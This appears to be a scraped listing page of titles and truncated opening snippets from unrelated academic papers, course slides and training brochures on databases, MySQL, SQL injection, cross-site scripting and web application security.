Database Design on Construction Project Cost System Nannan Zhang1,a, Wenfeng Song2,b 3rd International Conference on Materials Engineering, Manufacturing Technology and Control (ICMEMTC 2016) Database Design on Construction Project Cost System Nannan Zhang1,a, Wenfeng Song2,b 1 School

More information

CSC 337. Relational Databases and SQL. Rick Mercer

CSC 337. Relational Databases and SQL. Rick Mercer CSC 337 Relational Databases and SQL Rick Mercer Relational databases Relational database: A method of structuring data as tables associated to each other by shared attributes A table row corresponds to

More information

OUTLINE PERFORMANCE BENCHMARKING 7/23/18 SUB BENCHMARKING THE SECURITY OF SOFTWARE SYSTEMS OR TO BENCHMARK OR NOT TO BENCHMARK

OUTLINE PERFORMANCE BENCHMARKING 7/23/18 SUB BENCHMARKING THE SECURITY OF SOFTWARE SYSTEMS OR TO BENCHMARK OR NOT TO BENCHMARK BENCHMARKING THE SECURITY OF SOFTWARE SYSTEMS OR TO BENCHMARK OR NOT TO BENCHMARK mvieira@dei.uc.pt Department of Informatics Engineering University of Coimbra - Portugal QRS 2018 Lisbon, Portugal July

More information

Injection. CSC 482/582: Computer Security Slide #1

Injection. CSC 482/582: Computer Security Slide #1 Injection Slide #1 Topics 1. Injection Attacks 2. SQL Injection 3. Mitigating SQL Injection 4. XML Injection Slide #2 Injection Injection attacks trick an application into including unintended commands

More information

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang WEB SECURITY WORKSHOP TEXSAW 2014 Presented by Solomon Boyd and Jiayang Wang Introduction and Background Targets Web Applications Web Pages Databases Goals Steal data Gain access to system Bypass authentication

More information

MULTI-NODE DATABASE APPLICATION DEPLOYMENT ON LAMP ARCHITECTURE

MULTI-NODE DATABASE APPLICATION DEPLOYMENT ON LAMP ARCHITECTURE MULTI-NODE DATABASE APPLICATION DEPLOYMENT ON LAMP ARCHITECTURE M. M. Chavan and Y. V. Dongre Department of Computer Engineering, Vishwakarma Institute of Information Technology, Pune ABSTRACT Recent trends

More information

MySQL for Developers. Duration: 5 Days

MySQL for Developers. Duration: 5 Days Oracle University Contact Us: 0800 891 6502 MySQL for Developers Duration: 5 Days What you will learn This MySQL for Developers training teaches developers how to develop console and web applications using

More information

ATTACKING SYSTEM & WEB Desmond Alexander CISSP / GIAC/ GPEN CEO FORESEC

ATTACKING SYSTEM & WEB Desmond Alexander CISSP / GIAC/ GPEN CEO FORESEC ATTACKING SYSTEM & WEB Desmond Alexander CISSP / GIAC/ GPEN CEO FORESEC AGENDA VULNERABILITIES OF WEB EXPLOIT METHODS COUNTERMEASURE About Me DIRECTOR OF FORESEC COUNTER TERRORIST ACTION TEAM RESEARCH

More information

CSC System Development with Java. Database Connection. Department of Statistics and Computer Science. Budditha Hettige

CSC System Development with Java. Database Connection. Department of Statistics and Computer Science. Budditha Hettige CSC 308 2.0 System Development with Java Database Connection Budditha Hettige Department of Statistics and Computer Science Budditha Hettige 1 From database to Java There are many brands of database: Microsoft

More information

Validation of Web Alteration Detection using Link Change State in Web Page

Validation of Web Alteration Detection using Link Change State in Web Page Web 182-8585 1 5-1 m-shouta@uec.ac.jp,zetaka@computer.org Web Web URL Web Alexa Top 100 Web Validation of Web Alteration Detection using Link Change State in Web Page Shouta Mochizuki Tetsuji Takada The

More information

MySQL for Developers. Duration: 5 Days

MySQL for Developers. Duration: 5 Days Oracle University Contact Us: Local: 0845 777 7 711 Intl: +44 845 777 7 711 MySQL for Developers Duration: 5 Days What you will learn This MySQL for Developers training teaches developers how to develop

More information

PerfGuard: Binary-Centric Application Performance Monitoring in Production Environments

PerfGuard: Binary-Centric Application Performance Monitoring in Production Environments PerfGuard: Binary-Centric Application Performance Monitoring in Production Environments Chung Hwan Kim, Junghwan Rhee *, Kyu Hyung Lee +, Xiangyu Zhang, Dongyan Xu * + Performance Problems Performance

More information

An Empirical Study of PHP Security Mechanism Usage. Experience Report: Johannes Dahse and Thorsten Holz Ruhr-University Bochum, Germany

An Empirical Study of PHP Security Mechanism Usage. Experience Report: Johannes Dahse and Thorsten Holz Ruhr-University Bochum, Germany Johannes Dahse and Thorsten Holz Ruhr-University Bochum, Germany ISSTA 2015, July 13-17, Baltimore, Maryland, USA 2 1.1 Web Application State 82% of all websites run PHP as server-side language Weakly-typed

More information

Grid Resources Search Engine based on Ontology

Grid Resources Search Engine based on Ontology based on Ontology 12 E-mail: emiao_beyond@163.com Yang Li 3 E-mail: miipl606@163.com Weiguang Xu E-mail: miipl606@163.com Jiabao Wang E-mail: miipl606@163.com Lei Song E-mail: songlei@nudt.edu.cn Jiang

More information

Dynamically build connection objects for Microsoft Access databases in SQL Server Integration Services SSIS

Dynamically build connection objects for Microsoft Access databases in SQL Server Integration Services SSIS Dynamically build connection objects for Microsoft Access databases in SQL Server Integration Services SSIS Problem As a portion of our daily data upload process, we receive data in the form of Microsoft

More information

Introduction to InfoSec SQLI & XSS (R10+11) Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il)

Introduction to InfoSec SQLI & XSS (R10+11) Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il) Introduction to InfoSec SQLI & XSS (R10+11) Nir Krakowski (nirkrako at post.tau.ac.il) Itamar Gilad (itamargi at post.tau.ac.il) Covered material Useful SQL Tools SQL Injection in a Nutshell. Mass Code

More information

SQL Injection Attacks and Bypass Filtration

SQL Injection Attacks and Bypass Filtration EUROPEAN ACADEMIC RESEARCH Vol. IV, Issue 11/ February 2017 ISSN 2286-4822 www.euacademic.org Impact Factor: 3.4546 (UIF) DRJI Value: 5.9 (B+) SQL Injection Attacks and Bypass Filtration ISLAM ABDALLA

More information

Static analysis of PHP applications

Static analysis of PHP applications Static analysis of PHP applications Ondřej Šerý DISTRIBUTED SYSTEMS RESEARCH GROUP http://dsrg.mff.cuni.cz CHARLES UNIVERSITY PRAGUE Faculty of Mathematics and Physics References G. Wassermann, Z. Su:

More information

DOWNLOAD OR READ : WEB APPLICATION SECURITY AND DEFENSE STANDARD REQUIREMENTS PDF EBOOK EPUB MOBI

DOWNLOAD OR READ : WEB APPLICATION SECURITY AND DEFENSE STANDARD REQUIREMENTS PDF EBOOK EPUB MOBI DOWNLOAD OR READ : WEB APPLICATION SECURITY AND DEFENSE STANDARD REQUIREMENTS PDF EBOOK EPUB MOBI Page 1 Page 2 web application security and defense standard requirements web application security and pdf

More information

Web Security: Vulnerabilities & Attacks

Web Security: Vulnerabilities & Attacks Computer Security Course. Song Dawn Web Security: Vulnerabilities & Attacks Cross-site Scripting What is Cross-site Scripting (XSS)? Vulnerability in web application that enables attackers to inject client-side

More information

BIG-IP Application Security Manager : Attack and Bot Signatures. Version 13.0

BIG-IP Application Security Manager : Attack and Bot Signatures. Version 13.0 BIG-IP Application Security Manager : Attack and Bot Signatures Version 13.0 Table of Contents Table of Contents Assigning Attack Signatures to Security Policies...5 About attack signatures...5 About

More information

Secured Information Retrieval using CIDS and Map Reducing in Cloud

Secured Information Retrieval using CIDS and Map Reducing in Cloud Secured Information Retrieval using CIDS and Map Reducing in Cloud J.Indra Mercy Assistant Professor, CSE Saveetha Engineering College M. Kanimozhi, Assistant Professor, CSE, Saveetha Engineering College,.

More information

SQLStor: Blockage of Stored Procedure SQL Injection Attack Using Dynamic Query Structure Validation

SQLStor: Blockage of Stored Procedure SQL Injection Attack Using Dynamic Query Structure Validation SQLStor: Blockage of Stored Procedure SQL Injection Attack Using Dynamic Query Structure Validation Sruthy Mamadhan Department of CS Adi Shankara Institute of Engineering & Technology Kalady, India e-mail:

More information

Side Channel Vulnerabilities on the Web - Detection and Prevention. OWASP Education Project. The OWASP Foundation

Side Channel Vulnerabilities on the Web - Detection and Prevention. OWASP Education Project. The OWASP Foundation Side Channel Vulnerabilities on the Web - Detection and Prevention OWASP Education Project Sebastian Schinzel Virtual Forge GmbH University of Mannheim sebastian.schinzel@virtualforge.de Copyright 2007

More information

Application Security Use Cases. RASP, WAF, NGWAF, What The Hell is The Difference.

Application Security Use Cases. RASP, WAF, NGWAF, What The Hell is The Difference. Application Security Use Cases RASP, WAF, NGWAF, What The Hell is The Difference. Acronym Soup July 29, 2016 2 July 29, 2016 3 Definition of Terms WAF Web Application Firewall / waf / noun 1. An appliance,

More information

Remote monitoring system based on C/S and B/S mixed mode Kaibing Song1, a, Yinsong Wang2,band Dandan Shang3,c

Remote monitoring system based on C/S and B/S mixed mode Kaibing Song1, a, Yinsong Wang2,band Dandan Shang3,c 2nd International Conference on Electronics, Network and Computer Engineering (ICENCE 2016) Remote monitoring system based on C/S and B/S mixed mode Kaibing Song1, a, Yinsong Wang2,band Dandan Shang3,c

More information

The Devils Behind Web Application Vulnerabilities

The Devils Behind Web Application Vulnerabilities The Devils Behind Web Application Vulnerabilities Defending against Web Application Vulnerabilities IEEE Computer, February 2012 Nuno Antunes, Marco Vieira {nmsa, mvieira}@dei.uc.pt Postgrad Colloquium

More information

Collaboration System using Agent based on MRA in Cloud

Collaboration System using Agent based on MRA in Cloud Collaboration System using Agent based on MRA in Cloud Jong-Sub Lee*, Seok-Jae Moon** *Department of Information & Communication System, Semyeong University, Jecheon, Korea. ** Ingenium college of liberal

More information

Automatic Detection of Vulnerabilities in Web Applications using Fuzzing

Automatic Detection of Vulnerabilities in Web Applications using Fuzzing Automatic Detection of Vulnerabilities in Web Applications using Fuzzing Miguel Filipe Beatriz miguel.beatriz@tecnico.ulisboa.pt Instituto Superior Técnico, Lisboa, Portugal November 2014 Abstract Automatic

More information

Students completing CISB 15 - Microcomputer Applications will understand the importance of continuing their education in computer literacy.

Students completing CISB 15 - Microcomputer Applications will understand the importance of continuing their education in computer literacy. Course ID Course Name Course Outcome CISB 10 Office Skills Students completing CISB 10 - Office Skills will be able to correctly format a business style block letter using Microsoft Word. Students completing

More information